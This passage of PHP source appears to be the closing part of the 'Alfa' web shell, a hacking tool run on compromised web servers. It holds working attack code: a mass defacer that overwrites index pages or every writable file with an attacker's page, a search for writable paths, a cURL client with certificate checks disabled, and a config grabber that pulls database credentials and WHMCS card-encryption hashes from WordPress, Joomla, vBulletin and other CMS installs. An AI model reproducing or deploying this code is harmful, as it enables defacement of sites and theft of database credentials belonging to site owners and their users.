4103. echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');
4104. return false;
4105. \" method='post'>";
4106. echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
4107. Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
4108. DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
4109. </form>';
4110. $dir = $_POST['alfa1'];
4111. $defpage = $_POST['alfa2'];
4112. $method = $_POST['alfa3'];
4113. $fCurrent = $GLOBALS['__file_path'];
4114. if($_POST['alfa4'] == '>>'){ if(!empty($dir)){ if(@is_dir($dir)){ if(@is_readable($dir)){ if(@is_file($defpage)){ if($dh = @opendir($dir)){ echo __pre();
4115. while (($file = @readdir($dh)) !== false){ if($file == '..' || $file == '.')continue;
4116. $newfile=$dir.$file;
4117. if($fCurrent == $newfile)continue;
4118. if(@is_dir($newfile)){ Alfa_ReadDir($newfile,$method,$defpage);
4119. }else{ if(!@is_writable($newfile))continue;
4120. if(!@is_readable($newfile))continue;
4121. Alfa_Rewriter($newfile,$file,$defpage,$method);
4122. } } closedir($dh);
4123. }else{__alert('<font color="red">Error In OpenDir...</font>');
4124. } }else{__alert('<font color="red">DefPage File NotFound...</font>');
4125. } }else{__alert('<font color="red">Directory is not Readable...</font>');
4126. } }else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');
4127. } }else{__alert('<font color="red">Dir is Empty...</font>');
4128. } } echo '</div>';
4129. alfafooter();
4130. } function Alfa_ReadDir($dir,$method='',$defpage=''){ if(!@is_readable($dir)) return false;
4131. if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while(($file=readdir($dh))!==false) { if($file == '..' || $file == '.')continue;
4132. $newfile=$dir.'/'.$file;
4133. if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
4134. if(@is_file($newfile)){ if(!@is_readable($newfile))continue;
4135. Alfa_Rewriter($newfile,$file,$defpage,$method);
4136. } } closedir($dh);
4137. } } } function Alfa_Rewriter($dir,$file,$defpage,$m='index'){ if(!@is_writable($dir)) return false;
4138. if(!@is_readable($dir)) return false;
4139. $defpage=@file_get_contents($defpage);
4140. if($m == 'index'){ $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
4141. if(in_array(strtolower($file),$indexs)){ @file_put_contents($dir,$defpage);
4142. echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
4143. } }elseif($m=='all'){ @file_put_contents($dir,$defpage);
4144. echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
4145. } } function alfaGetDisFunc(){ alfahead();
4146. echo '<div class="header">';
4147. $disfun = @ini_get('disable_functions');
4148. $s = explode(',',$disfun);
4149. $f = array_unique($s);
4150. echo '<center><br><b><font color="#7CFC00">Disabled Functions</font></b><pre>';
4151. echo '<table border="1">
4152. <tr>
4153. <td align="center" style="background-color: green;
4154. color: white;
4155. width:5%">#</td>
4156. <td align="center" style="background-color: green;
4157. color: white;
4158. ">Func Name</td>
4159. </tr>
4160. ';
4161. $i=1;
4162. foreach($f as $s){ $s=trim($s);
4163. if(function_exists($s))continue;
4164. echo '<tr><td align="center" style="background-color: black;
4165. ">'.$i.'</td>';
4166. echo '<td align="center" style="background-color: black;
4167. "><a style="text-decoration: none;
4168. color: red;
4169. " target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><font color="red"><b>'.$s.'</b></font></a></td>';
4170. $i++;
4171. } echo '</table></center>';
4172. echo '</div>';
4173. alfafooter();
4174. } function Alfa_Create_A_Tag($action,$vals){ $nulls = array();
4175. foreach($vals as $key => $val){ echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
4176. for($i=1;
4177. $i<=$val[1]-1;
4178. $i++)$nulls[] = 'null';
4179. $f = implode(',',$nulls);
4180. echo $f.',\''.$val[0].'\');
4181. return false;
4182. ">| '.$key.' | </a>';
4183. unset($nulls);
4184. } } function Alfa_Searcher($dir, $ext, $method) { if(@is_readable($dir)){ if($method == 'all')$ext = '*';
4185. if($method == 'dirs')$ext = '*';
4186. $globFiles = @glob("$dir/*.$ext");
4187. $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
4188. $blacklist = array();
4189. foreach ($globDirs as $dir) { if(!@is_readable($dir)) continue;
4190. @Alfa_Searcher($dir, $ext, $method);
4191. } switch($method){ case "files": foreach ($globFiles as $file){ if(@is_writable($file)){ echo "$file<br>";
4192. } } break;
4193. case "dirs": foreach ($globFiles as $file){ if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){ echo dirname($file).'<br>';
4194. $blacklist[] = dirname($file);
4195. } } break;
4196. case "all": foreach ($globFiles as $file){ echo $file.'<br>';
4197. } break;
4198. } unset($blacklist);
4199. } } function AlfaiFrameCreator($f,$width='100%',$height='600px'){ return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
4200. } class AlfaCURL { var $headers;
4201. var $user_agent;
4202. var $compression;
4203. var $cookie_file;
4204. var $proxy;
4205. var $path;
4206. var $ssl = false;
4207. function AlfaCURL($cookies=false,$compression='gzip',$proxy=''){ $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
4208. $this->headers[] = 'Connection: Keep-Alive';
4209. $this->headers[] = 'Content-type: application/x-www-form-urlencoded;
4210. charset=UTF-8';
4211. $this->user_agent = 'Mozilla/4.0 (compatible;
4212. MSIE 7.0;
4213. Windows NT 5.1;
4214. .NET CLR 1.0.3705;
4215. .NET CLR 1.1.4322;
4216. Media Center PC 4.0)';
4217. $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
4218. $this->compression=$compression;
4219. $this->proxy=$proxy;
4220. $this->cookies=$cookies;
4221. if($this->cookies)$this->cookie($this->path);
4222. } function cookie($cookie_file) { if (@file_exists($cookie_file)) { $this->cookie_file=$cookie_file;
4223. }else{ @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
4224. $this->cookie_file=$cookie_file;
4225. @fclose($this->cookie_file);
4226. } } function Send($url,$method="get",$data=""){ $process = curl_init($url);
4227. curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
4228. curl_setopt($process, CURLOPT_HEADER, 0);
4229. curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
4230. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
4231. curl_setopt($process, CURLOPT_ENCODING , $this->compression);
4232. curl_setopt($process, CURLOPT_TIMEOUT, 30);
4233. if($this->ssl){ curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
4234. curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
4235. } if($this->cookies){ curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
4236. curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
4237. } if($this->proxy){ curl_setopt($process, CURLOPT_PROXY, $this->proxy);
4238. } if($method=='post'){ curl_setopt($process, CURLOPT_POSTFIELDS, $data);
4239. curl_setopt($process, CURLOPT_POST, 1);
4240. } $return = curl_exec($process);
4241. curl_close($process);
4242. return $return;
4243. } function error($error) { echo "<center><div style='width:500px;
4244. border: 3px solid #FFEEFF;
4245. padding: 3px;
4246. background-color: #FFDDFF;
4247. font-family: verdana;
4248. font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
4249. die;
4250. } } function getConfigHtml($cms){ $content = '';
4251. $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
4252. $content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);
4253. return false;
4254. '><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;
4255. '>";
4256. foreach($cms_array as $key => $val){ $content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
4257. } $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
4258. $content .= "</form>";
4259. return $content;
4260. } function alfaGetConfig(){ $cms = $_POST['alfa1'];
4261. $path = trim($_POST['alfa2']);
4262. $config = array( 'wp'=>array('file'=>'/wp-config.php', 'host'=>array("/define\('DB_HOST',(\s+)'(.*?)'\);
4263. /",2), 'dbname'=>array("/define\('DB_NAME',(\s+)'(.*?)'\);
4264. /",2), 'dbuser'=>array("/define\('DB_USER',(\s+)'(.*?)'\);
4265. /",2), 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)'(.*?)'\);
4266. /",2), 'prefix'=>array("/table_prefix(\s+)=(\s+)'(.*?)';
4267. /",3) ), 'drupal'=>array('file'=>'/config.php', 'host'=>array("/define\('DB_HOSTNAME',(\s+)'(.*?)'\);
4268. /",2), 'dbname'=>array("/define\('DB_DATABASE',(\s+)'(.*?)'\);
4269. /",2), 'dbuser'=>array("/define\('DB_USERNAME',(\s+)'(.*?)'\);
4270. /",2), 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)'(.*?)'\);
4271. /",2), 'prefix'=>array("/define\('DB_PREFIX',(\s+)'(.*?)'\);
4272. /",2) ), 'vb'=>array('file'=>'/includes/config.php', 'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)'(.*?)';
4273. /",3), 'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)'(.*?)';
4274. /",3), 'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)'(.*?)';
4275. /",3), 'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)'(.*?)';
4276. /",3), 'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)'(.*?)';
4277. /",3) ), 'phpnuke'=>array('file'=>'/config.php', 'host'=>array('/dbhost(\s+)=(\s+)"(.*?)";
4278. /',3), 'dbname'=>array('/dbname(\s+)=(\s+)"(.*?)";
4279. /',3), 'dbuser'=>array('/dbuname(\s+)=(\s+)"(.*?)";
4280. /',3), 'dbpw'=>array('/dbpass(\s+)=(\s+)"(.*?)";
4281. /',3), 'prefix'=>array('/prefix(\s+)=(\s+)"(.*?)";
4282. /',3) ), 'smf'=>array('file'=>'/Settings.php', 'host'=>array("/db_server(\s+)=(\s+)'(.*?)';
4283. /",3), 'dbname'=>array("/db_name(\s+)=(\s+)'(.*?)';
4284. /",3), 'dbuser'=>array("/db_user(\s+)=(\s+)'(.*?)';
4285. /",3), 'dbpw'=>array("/db_passwd(\s+)=(\s+)'(.*?)';
4286. /",3), 'prefix'=>array("/db_prefix(\s+)=(\s+)'(.*?)';
4287. /",3) ), 'whmcs'=>array('file'=>'/configuration.php', 'host'=>array("/db_host(\s+)=(\s+)'(.*?)';
4288. /",3), 'dbname'=>array("/db_name(\s+)=(\s+)'(.*?)';
4289. /",3), 'dbuser'=>array("/db_username(\s+)=(\s+)'(.*?)';
4290. /",3), 'dbpw'=>array("/db_password(\s+)=(\s+)'(.*?)';
4291. /",3), 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)'(.*?)';
4292. /",3) ), 'joomla'=>array('file'=>'/configuration.php', 'host'=>array("/\\\$host(\s+)=(\s+)'(.*?)';
4293. /",3), 'dbname'=>array("/\\\$db(\s+)=(\s+)'(.*?)';
4294. /",3), 'dbuser'=>array("/\\\$user(\s+)=(\s+)'(.*?)';
4295. /",3), 'dbpw'=>array("/\\\$password(\s+)=(\s+)'(.*?)';
4296. /",3), 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)'(.*?)';
4297. /",3) ), 'phpbb'=>array('file'=>'/config.php', 'host'=>array("/dbhost(\s+)=(\s+)'(.*?)';
4298. /",3), 'dbname'=>array("/dbname(\s+)=(\s+)'(.*?)';
4299. /",3), 'dbuser'=>array("/dbuser(\s+)=(\s+)'(.*?)';
4300. /",3), 'dbpw'=>array("/dbpasswd(\s+)=(\s+)'(.*?)';
4301. /",3), 'prefix'=>array("/table_prefix(\s+)=(\s+)'(.*?)';
4302. /",3) ), 'mybb'=>array('file'=>'/inc/config.php', 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)'(.*?)';
4303. /",3), 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)'(.*?)';
4304. /",3), 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)'(.*?)';
4305. /",3), 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)'(.*?)';
4306. /",3), 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)'(.*?)';
4307. /",3) ) );
4308. $data = array();
4309. $srch_host = $config[$cms]['host'][0];
4310. $srch_user = $config[$cms]['dbuser'][0];
4311. $srch_name = $config[$cms]['dbname'][0];
4312. $srch_pw = $config[$cms]['dbpw'][0];
4313. $prefix = $config[$cms]['prefix'][0];
4314. $file = $config[$cms]['file'];
4315. $chost = $config[$cms]['host'][1];
4316. $cuser = $config[$cms]['dbuser'][1];
4317. $cname = $config[$cms]['dbname'][1];
4318. $cpw = $config[$cms]['dbpw'][1];
4319. $cprefix = $config[$cms]['prefix'][1];
4320. if(@is_dir($path)){ $file=$path.$file;
4321. }elseif(@is_file($path)){ $file=$path;
4322. }else{ return false;
4323. } $file = @file_get_contents($file);
4324. if(preg_match($srch_host, $file, $mach)){ $data['host'] = $mach[$chost];
4325. } if(preg_match($srch_user, $file, $mach)){ $data['user'] = $mach[$cuser];
4326. } if(preg_match($srch_name, $file, $mach)){ $data['dbname'] = $mach[$cname];
4327. } if(preg_match($srch_pw, $file, $mach)){ $data['password'] = $mach[$cpw];
4328. } if(isset($prefix)){ if(preg_match($prefix, $file, $mach)){ $data['prefix'] = $mach[$cprefix];
4329. } } if($cms=='whmcs'){ if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){ $data['cc_encryption_hash'] = $mach[3];
4330. } } echo json_encode($data);
4331. } if(empty($_POST['a'])) if(isset($default_action) && function_exists('alfa' . $default_action)) $_POST['a'] = $default_action;
4332. else $_POST['a'] = 'FilesMan';
4333. if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) call_user_func('alfa' . $_POST['a']);
4334. exit;
4335. ?>